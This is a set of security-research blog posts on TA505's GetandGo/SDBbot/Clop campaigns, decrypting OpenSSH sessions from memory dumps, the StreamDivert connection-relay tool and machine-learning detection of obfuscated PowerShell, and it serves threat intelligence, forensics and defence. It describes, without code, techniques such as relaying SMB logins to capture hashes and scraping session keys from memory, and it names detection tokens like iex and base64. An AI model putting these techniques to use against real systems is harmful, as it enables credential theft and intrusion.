2. This compromised URL redirects again to the XLS file download page, which is operated by the actor.

3. From this URL the victim downloads the XLS file, frequently the language of the website can indicate the country targeted.

4. Once the XLS is downloaded and triggered, GetandGo is executed, communicates with the C&C and downloads SDBbot.


















2.2. SDBbot Infection Process

Figure 2. SDBbot infection process
Figure 2. SDBbot infection process


1. GetandGo executes the “ReflectiveLoader” export of SDBbot.

2. SDBbot contains of three modules. The Installer, Loader, RAT module.

3.Initially the Installer module is executed, creates a Registry BLOB containing the Loader code and the RAT module.

4. The Loader module is dropped into disk and persistence is maintained via this module.

5. The Loader module, reads the Registry Blob and loads the Loader code. This loader code is executed and Loads the RAT module which is again executed in memory.

6. The RAT module communicates with the C&C and awaits commands from the administrator.





















2.3. TA505 Infection Chain

Figure 3. TA505 Infection Chain
Figure 3. TA505 Infection Chain

Once SDBbot has obtained persistence, the actor uses this RAT in order to grab information from the machine, prepare the environment and download the next payloads. At this stage, also the operator might kill the bot if it is determined that the victim is not interesting to them.

For further infection of victims and access of administrator accounts, FOX-IT has also observed Tinymet and Cobalt Strike frequently being used.

3. TA505 Packer

To evade antivirus security products and frustrate malware reverse engineering, malware operators leverage encryption and compression via executable packing to protect their malicious code. Malware packers are essentially software programs that either encrypt or compress the original malware binary, thus making it unreadable until it’s placed in memory.

In general, malware packers consist of two components:
• A packed buffer, the actual malicious code
• An “unpacking stub” responsible for unpacking and executing the packed buffer

TA505 also works with a custom packer, however their packer contains two buffers. The initial stub decrypts the first buffer which acts as another unpacking stub. The second unpacking stub subsequently unpacks the second buffer that contains the malicious executable. In addition to their custom packer, TA505 often packs their malware with a second or even a third layer of UPX (a publicly available open-source executable packer).

Below we represent an overview of the TA505 packing routines seen by Fox-IT. In total we can differentiate four different packing routines based on the packing layers and the number of observed samples.

X64 X86
1 UPX(TA505 Custom Packer(UPX(Malicious Binary))) 0% 0.5%
2 UPX(TA505 Custom Packer(Malicious Binary)) 13.7% 0%
3 TA505 Custom Packer(UPX(Malicious Binary)) 0% 98.64%
4 TA505 Custom Packer(Malicious Binary) 86.3% 0.86%
TA505 Packing Routines

To aid our research, a Fox-IT analyst wrote a program dubbed “TAFOF Unpacker” to statically unpack samples packed with the custom TA505 packer.

We observed that the TA505 packed samples had a different Compilation Timestamp than the unpacked samples, and they were correlating correctly with the Campaign Timestamp. Furthermore, samples belonging to the same campaign used the same XOR-Key to unpack the actual malware.

4. Data Research

Over the course of approximately a year, Fox-IT was able to collect TA505 initial XLS samples. Each XLS file contained two embedded DLLs: a x64 and a x86 version of the Get2/GetandGo loader.

Both DLLs are packed with the same packer. However, the XOR-key to decrypt the buffer is different. We have “named” the campaigns we identified based on the combination of those XOR-Keys: x86-XOR-Key:x64-XOR-Key (e.g. campaign 0X50F1:0X1218). All of the timestamps related to the captured samples were converted to UTC. For hashes that existed on VirusTotal we used those timestamps as first seen; for the remainder, the Fox-IT Malware Lab was used.

Find below an overview on the descriptive statistics of both datasets:

Figure 4. Datasets Statistics
Figure 4. Datasets Statistics

4.1. Dataset 1, Working Hours and Workflow routine

During this period, we collected all the XLS files matching our TA505-GetandGo Yara rule and we unpacked them with TAFOF Unpacker. We observed that the compilation timestamps of the packed samples were different from the unpacked ones. Furthermore, the unpacked one was clearly indicating the malspam campaign date.

For the Dataset 1, we used the VirusTotal first seen timestamp as an estimation of when the campaign took place.

In the following graph we plotted all 81 campaigns (XOR-key combinations), and ordered them chronologically based on the C&C domain registration time.

What we noticed was, that we see relatively short orange/yellow/light green patches: meaning that the domain was registered shortly before they compiled the malware, and a few hours/days the first sample of this campaign was found on VirusTotal.

Figure 5. Dataset 1, Campaigns overview
Figure 5. Dataset 1, Campaigns overview

As seen by the graph, it seems clear the workflow followed most of the times by the group: Registering the C&C, compiling the malware and shortly after, releasing the malspam campaign.

As seen on the 37% of the campaigns, the first seen sample and compilation timestamp are observed within 12 hours, while 79% of the campaigns are discovered after 1 day of the compilation timestamp and 91.3% within 2 days.

We can also observe the long vacations taken during the Christmas/New Year period (20th December 2019 until 13th of January 2020), another indication of Russian Cybercrime groups.

Figure 6. Dataset 1, Compilation Timestamps UTC
Figure 6. Dataset 1, Compilation Timestamps UTC

The group mostly works on Mondays, Wednesdays and Thursdays, less frequently Tuesdays, Fridays and Sundays (mostly preparing for Monday campaign). As for the time, earliest is usually 6 AM UTC and latest 10 PM UTC. Those time schedules give us once again a small indication about the time zone where the actor is operating from.

4.2. Dataset 2, Working Hours and Workflow routine

For the Dataset 2, we used as a source the first seen date of the InTELL Malware Lab. This dataset contains samples obtained after their time off. In this research we combined SDBbot data as well, which is the next stage payload of Get2. Furthermore, for this second dataset we managed to collect TA505 malspam emails from actual targets/victims indicating the country targeted from the email’s language.

Figure 7. Dataset 2, Campaigns overview
Figure 7. Dataset 2, Campaigns overview

From the above graph we can clearly behold, that multiple GetandGo campaigns were downloading the “same SDBbot” (same C&C). This information makes even more clear the actual use of the short lifespan of a GetandGo C&C, which is to miss the link with the SDBbot C&C (as happened for this research on the 24th of June). This allows the group for a longer lifespan of the SDBbot C&C, avoiding being easily detected.

Figure 8. Dataset 2, GetandGo Compilation Timestamps UTC
Figure 8. Dataset 2, GetandGo Compilation Timestamps UTC

The working days are the same since they restarted after their long time off, although now we see a small difference on the working hours, starting as early as 5 AM UTC until 11 PM UTC. This small 1 hour difference from the earliest working time might indicate that the group started “working from home” like the rest of the world during these pandemic times. However as both periods are in respectively winter and summer time, it could also be related to daylight savings time. This combined with the prior knowledge that the group is communicating in Russian language this points specifically to Ukraine being the only majority Russian speaking country with DST, but this would be speculation by itself.

The time information does point however to a likely Eastern European presence of the group, and not all members have to be necessarily in one country.

Figure 9. Dataset 2, GetandGo and SDBbot Compilation Timestamps UTC
Figure 9. Dataset 2, GetandGo and SDBbot Compilation Timestamps UTC

When we plotted also the SDBbot compilation timestamps we observed that GetandGo is more of a morning/day work for the group as they need to target victims during their working schedule, but SDBbot is performed mostly during the evening, as they don’t need to hurry as much in this case.

5. Dransom Time

“Dransom time, is the period from when a malicious attack enters the network until the ransomware is released.”

Once the initial access is achieved, the group is getting its hands on SDBbot and starts moving laterally in order to obtain root/admin access to the victim company/organization. This process can vary from target to target as well as the duration from initial access (GetandGo) to ransomware (Clop).

Figure 10. Dransom Time 69 days
Figure 10. Dransom Time 69 days

Figure 11. Dransom Time 3 days
Figure 11. Dransom Time 3 days

Figure 12. Dransom Time 32 days
Figure 12. Dransom Time 32 days

The differences on the Dransom time manifests that the group is capable of staying undetected for long periods of time (more than 2 months), as well as getting root access as fast as their time allows (3 days).

* There are definitely more extreme Dransom times accomplished by this group, but the above are some of the ones we encountered and managed to obtain.

6. Working Schedule

With the above data at hand, we were able to accurately estimate the work focus of the group at specific days and times during the past year.

The below week dates are some examples of this data, plotted in a weekly schedule (time in UTC).

* Each color represents a different campaign.

6.1. Week 42, 14-20 of October 2019

Figure 13. TA505 Weekly Schedule, week 42 2019

During this week, the group released six different campaigns targeting various geographical regions. We observe the group preparing two Monday campaigns on Sunday. And as for Tuesday, they managed to achieve the initial infection at Maastricht University.

On Wednesday, the group performed two campaigns targeting different regions, although this time they used the same C&C domain and the only difference was the URL path (f1610/f1611).

6.2. Week 43, 21-27 of October 2019

Figure 14. TA505 Weekly Schedule, week 43 2019

Throughout week 43, the group performed three campaigns. First campaign was released on Monday and was partially prepared on Sunday.

As for Wednesday, the group prepared and released a campaign on the same day, which resulted on the initial infection of Antwerp University. For the next three to four days, the group managed to get administrator access, and released Clop ransomware on Saturday of the same week.

6.3. Week 51, 16-22 of December 2019

Figure 15. TA505 Weekly Schedule, week 51 2019

Week 51 was the last week before their ~20 days “vacation” period where Fox-IT didn’t observe any new campaigns. Last campaign of this week was observed on Thursday.

During those days of “vacations”, the group was mainly off, although they were spotted activating Clop ransomware at Maastricht University and encrypting their network after more than two months since the initial access (week 42).

6.4. Week 2, 6-12 of January 2020

Figure 16. TA505 Weekly Schedule, week 2 2020

While on week 2 the group didn’t release any campaigns, they were observed preparing the first campaign since their “vacations” on late Sunday, to be later released on Monday of the 3rd week.

7. Conclusion

The extreme Dransom times demonstrate a highly sophisticated and capable threat actor, able to stay under the radar for long periods of time, as well as quickly achieving administrator access when possible. Their working schedule manifests a well-organized and well-structured group with high motivation, working in a criminal enterprise full days starting early and finishing late at night when needed. The hourly timing information does suggest that the actors are in Eastern Europe and mostly working along a fairly set schedule, with a reasonable possibility that the group resides in Ukraine as the only majority Russian speaking country observing daylight savings time. Since their MO switched after the introduction of Clop ransomware in early 2019, TA505 has been an important threat to all kind of organizations in various sectors across the world.

Decrypting OpenSSH sessions for fun and profit

Author: Jelle Vergeer

Introduction

A while ago we had a forensics case in which a Linux server was compromised and a modified OpenSSH binary was loaded into the memory of a webserver. The modified OpenSSH binary was used as a backdoor to the system for the attackers. The customer had pcaps and a hypervisor snapshot of the system on the moment it was compromised. We started wondering if it was possible to decrypt the SSH session and gain knowledge of it by recovering key material from the memory snapshot. In this blogpost I will cover the research I have done into OpenSSH and release some tools to dump OpenSSH session keys from memory and decrypt and parse sessions in combinarion with pcaps. I have also submitted my research to the 2020 Volatility framework plugin contest.

SSH Protocol

Firstly, I started reading up on OpenSSH and its workings. Luckily, OpenSSH is opensource so we can easily download and read the implementation details. The RFC’s, although a bit boring to read, were also a wealth of information. From a high level overview, the SSH protocol looks like the following:

  1. SSH protocol + software version exchange
  2. Algorithm negotiation (KEX INIT)
    • Key exchange algorithms
    • Encryption algorithms
    • MAC algorithms
    • Compression algorithms
  3. Key Exchange
  4. User authentication
  5. Client requests a channel of type “session”
  6. Client requests a pseudo terminal
  7. Client interacts with session

Starting at the begin, the client connects to the server and sends the protocol version and software version:
SSH-2.0-OpenSSH_8.3. The server responds with its protocol and software version. After this initial protocol and software version exchange, all traffic is wrapped in SSH frames. SSH frames exist primarily out of a length, padding length, payload data, padding content, and MAC of the frame. An example SSH frame:

Example SSH Frame parsed with dissect.cstruct

Before an encryption algorithm is negotiated and a session key is generated the SSH frames will be unencrypted, and even when the frame is encrypted, depending on the algorithm, parts of the frame may not be encrypted. For example aes256-gcm will not encrypt the 4 bytes length in the frame, but chacha20-poly1305 will.

Next up the client will send a KEX_INIT message to the server to start negotiating parameters for the session like key exchange and encryption algorithm. Depending on the order of those algorithms the client and server will pick the first preferred algorithm that is supported by both sides. Following the KEX_INIT message, several key exchange related messages are exchanged after which a NEWKEYS messages is sent from both sides. This message tells the other side everything is setup to start encrypting the session and the next frame in the stream will be encrypted. After both sides have taken the new encryption keys in effect, the client will request user authentication and depending on the configured authentication mechanisms on the server do password/ key/ etc based authentication. After the session is authenticated the client will open a channel, and request services over that channel based on the requested operation (ssh/ sftp/ scp etc).

Recovering the session keys

The first step in recovering the session keys was to analyze the OpenSSH source code and debug existing OpenSSH binaries. I tried compiling OpenSSH myself, logging the generated session keys somewhere and attaching a debugger and searching for those in the memory of the program. Success! Session keys were kept in memory on the heap. Some more digging into the source code pointed me to the functions responsible for sending and recieving the NEWKEYS frame. I discovered there is a “ssh” structure which stores a “session_state” structure. This structure in turn holds all kinds of information related to the current SSH session inluding a newkeys structure containing information relating the encryption, mac and compression algorithm. One level deeper we finally find the “sshenc” structure holding the name of the cipher, the key, IV and the block length. Everything we need! A nice overview of the structure in OpenSSH is shown below:

SSHENC Structure and relations

And the definition of the sshenc structure:

SSHENC Structure

It’s difficult to find the key itself in memory (it’s just a string of random bytes), but the sshenc (and other) structures are more distinct, having some properties we can validate against. We can then scrape the entire memory address space of the program and validate each offset against these constraints. We can check for the following properties:

  • name, cipher, key and iv members are valid pointers
  • The name member points to a valid cipher name, which is equal to cipher->name
  • key_len is within a valid range
  • iv_len is within a valid range
  • block_size is within a valid range

If we validate against all these constraints we should be able to reliably find the sshenc structure. I started of building a POC Python script which I could run on a live host which attaches to processes and scrapes the memory for this structure. The source code for this script can be found here. It actually works rather well and outputs a json blob for each key found. So I demonstrated that I can recover the session keys from a live host with Python and ptrace, but how are we going to recover them from a memory snapshot? This is where Volatility comes into play. Volatility is a memory forensics framework written in Python with the ability to write custom plugins. And with some efforts, I was able to write a Volatility 2 plugin and was able to analyze the memory snapshot and dump the session keys! For the Volatility 3 plugin contest I also ported the plugin to Volatility 3 and submitted the plugin and research to the contest. Fingers crossed!

Volatility 2 SSH Session Key Dumper output

Decrypting and parsing the traffic

The recovery of the session keys which are used to encrypt and decrypt the traffic was succesfull. Next up is decrypting the traffic! I started parsing some pcaps with pynids, a TCP parsing and reassembly library. I used our in-house developed dissect.cstruct library to parse data structures and developed a parsing framework to parse protocols like ssh. The parsing framework basically feeds the packets to the protocol parser in the correct order, so if the client sends 2 packets and the server replies with 3 packets the packets will also be supplied in that same order to the parser. This is important to keep overall protocol state. The parser basically consumes SSH frames until a NEWKEYS frame is encountered, indicating the next frame is encrypted. Now the parser peeks the next frame in the stream from that source and iterates over the supplied session keys, trying to decrypt the frame. If successful, the parser installs the session key in the state to decrypt the remaining frames in the session. The parser can handle pretty much all encryption algorithms supported by OpenSSH. The following animation tries to depict this process:

SSH Protocol Parsing

And finally the parser in action, where you can see it decrypts and parses a SSH session, also exposing the password used by the user to authenticate:

Example decrypted and parsed SSH session

Conclusion

So to sum up, I researched the SSH protocol, how session keys are stored and kept in memory for OpenSSH, found a way to scrape them from memory and use them in a network parser to decrypt and parse SSH sessions to readable output. The scripts used in this research can be found here:

A potential next step or nice to have would be implementing this decrypter and parser into Wireshark.

Final thoughts

Funny enough, during my research I also came across these commented lines in the ssh_set_newkeys function in the OpenSSH source. How ironic! If these lines were uncommented and compiled in the OpenSSH binaries this research would have been much harder..

OpenSSH source code snippet

References

StreamDivert: Relaying (specific) network connections

Author: Jelle Vergeer

The first part of this blog will be the story of how this tool found its way into existence, the problems we faced and the thought process followed. The second part will be a more technical deep dive into the tool itself, how to use it, and how it works.

Storytime

About 1½ half years ago I did an awesome Red Team like project. The project boils down to the following:

We were able to compromise a server in the DMZ region of the client’s network by exploiting a flaw in the authentication mechanism of the software that was used to manage that machine (awesome!). This machine hosted the server part of another piece of software. This piece of software basically listened on a specific port and clients connected to it – basic client-server model. Unfortunately, we were not able to directly reach or compromise other interesting hosts in the network. We had a closer look at that service running on the machine, dumped the network traffic, and inspected it. We came to the conclusion there were actual high value systems in the client’s network connecting to this service..! So what now? I started to reverse engineer the software and came to the conclusion that the server could send commands to clients which the client executed. Unfortunately the server did not have any UI component (it was just a service), or anything else for us to send our own custom commands to clients. Bummer! We furthermore had the restriction that we couldn’t stop or halt the service. Stopping the service, meant all the clients would get disconnected and this would actually cause quite an outage resulting in us being detected (booh). So.. to sum up:

  • We compromised a server, which hosts a server component to which clients connect.
  • Some of these clients are interesting, and in scope of the client’s network.
  • The server software can send commands to clients which clients execute (code execution).
  • The server has no UI.
  • We can’t kill or restart the service.

What now? Brainstorming resulted in the following:

  • Inject a DLL into the server to send custom commands to a specific set of clients.
  • Inject a DLL into the server and hook socket functions, and do some logic there?
  • Research if there is any Windows Firewall functionality to redirect specific incoming connections.
  • Look into the Windows Filtering Platform (WFP) and write a (kernel) driver to hook specific connections.

The first two options quickly fell of, we were too scared of messing up the injected DLL and actually crashing the server. The Windows Firewall did not seem to have any capabilities regarding redirecting specific connections from a source IP. Due to some restrictions on the ports used, the netsh redirect trick would not work for us. This left us with researching a network driver, and the discovery of an awesome opensource project: WinDivert (Thanks to DiabloHorn for the inspiration). WinDivert is basically a userland library that communicates with a kernel driver to intercept network packets, sends them to the userland application, processes and modifies the packet, and reinjects the packet into the network stack. This sounds promising! We can develop a standalone userland application that depends on a well-written and tested driver to modify and re-inject packets. If our userland application crashes, no harm is done, and the network traffic continues with the normal flow. From there on, a new tool was born: StreamDivert

StreamDivert

StreamDivert is a tool to man-in-the-middle or relay in and outgoing network connections on a system. It has the ability to, for example, relay all incoming SMB connections to port 445 to another server, or only relay specific incoming SMB connections from a specific set of source IP’s to another server. Summed up, StreamDivert is able to:

  • Relay all incoming connections to a specific port to another destination.
  • Relay incoming connections from a specific source IP to a port to another destination.
  • Relay incoming connections to a SOCKS(4a/5) server.
  • Relay all outgoing connections to a specific port to another destination.
  • Relay outgoing connections to a specific IP and port to another destination.
  • Handle TCP, UDP and ICMP traffic over IPv4 and IPv6.

Schematic inbound and outbound relaying looks like the following:

Relaying of incoming connections

Relaying of outgoing connections

Note that StreamDivert does this by leveraging the capabilities of an awesome open source library and kernel driver called WinDivert. Because packets are captured at kernel level, transported to the userland application (StreamDivert), modified, and re-injected in the kernel network stack we are able to relay network connections, regardless if there is anything actually  listening on the local destination port.

The following image demonstrates the relay process where incoming SMB connections are redirected to another machine, which is capturing the authentication hashes.

Example of an SMB connection being diverted and relayed to another server.

StreamDivert source code is open-source on GitHub and its binary releases can be downloaded here.

Detection

StreamDivert (or similar tooling modifying network packets using the WinDivert driver) can be detected based on the following event log entries:

Machine learning from idea to reality: a PowerShell case study

Detecting both ‘offensive’ and obfuscated PowerShell scripts in Splunk using Windows Event Log 4104

Author: Joost Jansen

This blog provides a ‘look behind the scenes’ at the RIFT Data Science team and describes the process of moving from the need or an idea for research towards models that can be used in practice. More specifically, how known and unknown PowerShell threats can be detected using Windows event log 4104. In this case study it is shown how research into detecting offensive (with the term ‘offensive’ used in the context of ‘offensive security’) and obfuscated PowerShell scripts led to models that can be used in a real-time environment.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

Introduction to PowerShell

PowerShell plays a huge role in a lot of incidents that are analyzed by Fox-IT. During the compromise of a Windows environment almost all actors use PowerShell in at least one part of their attack, as illustrated by the vast list of actors linked to this MITRE technique [1]. PowerShell code is most frequently used for reconnaissance, lateral movement and/or C2 traffic. It lends itself to these purposes, as the PowerShell cmdlets are well-integrated with the Windows operating system and it is installed along with Windows in most recent versions.

The strength of PowerShell can be illustrated with the following example. Consider the privilege-escalation enumeration script PowerUp.ps1 [2]. Although the script itself consists of 4010 lines, it can simply be downloaded and invoked using:

In this case, the script won’t even touch the disk as it’s executed in memory. Since threat actors are aware that there might be detection capabilities in place, they often encode or obfuscate their code. For example, the command executed above can also be run base64-encoded:

which has the exact same result.

Using tools like Invoke-Obfuscation [3], the command and the script itself can be obfuscated even further. For example, the following code snippet from PowerUp.ps1

can also be obfuscated as:

These well-known offensive PowerShell scripts can already be detected by using static signatures, but small modifications on the right place will circumvent the detection. Moreover, these signatures might not detect new versions of the known offensive scripts, let alone detect new techniques. Therefore, there was an urge to create models to detect offensive PowerShell scripts regardless of their obfuscation level, as illustrated in Table 1.

Table 1: Detection of different malicious PowerShell scripts

Don’t reinvent the wheel

As we don’t want to re-invent the wheel, a literature study revealed fellow security companies had already performed research on this subject [4, 5], which was a great starting point for this research. As we prefer easily explainable classification models over complex ones (e.g. the neural networks used in the previous research) and obviously faster models over slower ones, not all parts of the research were applicable. However, large parts of the data gathering & pre-processing phase were reused while the actual features and classification method were changed.

Since detecting offensive & obfuscated PowerShell scripts are separate problems, they require separate training data. For the offensive training data, PowerShell scripts embedded in “known bad” GitHub repositories were scraped. For the obfuscated training data, parts of the Revoke-Obfuscation training data set were used [6]. An equal amount of legitimate (‘known not-obfuscated’ and “known not-offensive”) scripts were added to the training sets (retrieved from the PowerShell Gallery [7]) resulting in the training sets listed in Table 2.

Table 2: Training set sizes

To keep things simple and explainable the decision was made to base the initial model on token (offensive) and character (obfuscated) percentages. This did require some preprocessing of the scripts (e.g. removing the comments), calculating the features and in the case of the offensive scripts, tokenization of the PowerShell scripts. Figures 1 & 2 illustrate how some characters and tokens are unevenly distributed among the training sets.

Figure 1: Average occurrence of several ASCII characters in obfuscated and not-obfuscated scripts
Figure 2: Average occurrence of several tokens in offensive and not-offensive scripts

The percentages were then used as features for a supervised classification model to train, along with some additional features based on known bad tokens (e.g. base64, iex and convert) and several regular expression patterns. Afterwards all features and labels were fed to our SupervisedClassification helper class, which is used in many of our projects to standardize the process of (synthetic) sampling of training data, DataFrame transformations, model selection and several other tasks. For both models, the SupervisedClassification class selected the Random Forest algorithm for the classifying task. Figure 3 summarizes the workflow for the obfuscated PowerShell model.

Figure 3: High-level overview of the training process for the obfuscation model

Usage in practice

Since these models were exported, they can be used for multiple purposes by loading the models in Python, feeding PowerShell scripts to it and observe the predicted outcomes. In this example, Splunk was chosen as the platform to use this model because it is part of our Managed Detection & Response service and because of Splunk’s ability to easily run custom Python commands.

Windows is able to log blocks of PowerShell code as it is executed, called ‘PowerShell Script Block Logging’ which can be enabled via GPO or manual registry changes. The logs (identified by Windows Event ID 4101) can then be piped to a Splunk custom command Reconstruct4101Logging, which will process the script blocks back into the format the model was trained on. Afterwards, the reconstructed script is piped into e.g. the ObfuscatedPowershell custom command, which will load the pre-trained model, predict the probabilities for the scripts being obfuscated and returns these predictions back to Splunk. This is shown in Figure 4.

Figure 4: Usage of the pre-trained model in Splunk along with the corresponding query

Performance

Back in Splunk some additional tuning can be performed (such as setting the threshold for predicting the positive class to 0.7) to reduce the amount of false positives. Using cross-validation, a precision score of 0.94 was achieved with an F1 score of 0.9 for the obfuscated PowerShell model. The performance of the offensive model is not yet as good as the obfuscated model, but since there are many parameters to tune for this model we expect this to improve in the foreseeable future. The confusion matrix for the obfuscated model is shown in Table 3.

Table 3: Confusion matrix

Despite the fact that other studies achieve even higher scores, we believe that this relatively simple and easy to understand model is a great first step, for which we can iteratively improve the scores over time. To finish off, these models are included in our Splunk Managed Detection Engine to check for offensive & obfuscated PowerShell scripts on a regular interval.

Conclusion and recommendation

PowerShell, despite being a legitimate and very useful tool, is frequently misused by threat actors for various malicious purposes. Using static signatures, well-known bad scripts can be detected, but small modifications may cause these signatures to be circumvented. To detect modified and/or new PowerShell scripts and techniques, more and better generic models should be researched and eventually be deployed in real-time log monitoring environments. PowerShell logging (including but not limited to the Windows Event Logs with ID 4104) can be used as input for these models. The recommendation is therefore to enable the PowerShell logging in your organization, at least at the most important endpoints or servers. This recommendation, among others, was already present in our whitepaper on ‘Managing PowerShell in a modern corporate environment‘ [8] back in 2017 and remains very relevant to this day. Additional information on other defensive measures that can be put into place can also be found in the whitepaper.

References

[1] https://attack.mitre.org/techniques/T1059/001/
[2] https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
[3] https://github.com/danielbohannon/Invoke-Obfuscation
[4] https://arxiv.org/pdf/1905.09538.pdf
[5] https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
[6] https://github.com/danielbohannon/Revoke-Obfuscation/tree/master/DataScience
[7] https://www.powershellgallery.com/
[8] https://www.nccgroup.com/uk/our-research/managing-powershell-in-a-modern-corporate-environment/

❌